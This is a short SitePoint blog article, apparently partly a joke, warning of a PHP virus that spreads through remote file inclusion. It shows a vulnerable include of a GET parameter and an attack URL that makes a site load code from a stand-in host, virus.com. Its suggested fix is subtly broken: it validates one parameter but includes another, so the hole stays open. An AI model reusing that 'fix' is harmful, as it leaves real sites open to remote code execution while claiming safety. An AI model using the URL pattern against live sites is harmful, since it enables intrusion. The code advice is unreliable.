Programming
Article
By Harry Fuecks

PHP Virus Attacking Web Hosts

By Harry Fuecks
Help us help you! You'll get a... FREE 6-Month Subscription to SitePoint Premium Plus you'll go in the draw to WIN a new Macbook SitePoint 2017 Survey Yes, let's Do this It only takes 5 min

Symantec have a report of the virus here.

I’ve yet to see any of the PHP news sites picking up on it but, using a virtual host account, managed to deliberately expose some PHP scripts to it.

From examining the infected scripts, what’s disturbing is once infected, every time a script is executed, the virus goes on a hunt for other web sites using PHP to see if it can trick them into executing the virus, thereby spreading it further directly over the Internet. Although the spread it likely to be slow, it can takes place automatically, without your intervention!

If your site contains code like;


// index.php
include $_GET['page'];

You need to take action now – your site could be infected with a URL like;


http://yoursite.com/index.php?page=http://virus.com/virus.php

A simple way to validate is;


$pages = array('news','articles','blog');
if ( in_array($_GET['page'], $pages) ) {
    include $_GET['php'] . '.php';
} else {
    include 'home.php';
}

Sitepoint have taken the extreme but necessary approach of upgrading to .NET in response.

Login or Create Account to Comment
Login Create Account
Recommended
Sponsors
Get the most important and interesting stories in tech. Straight to your inbox, daily.Is it good?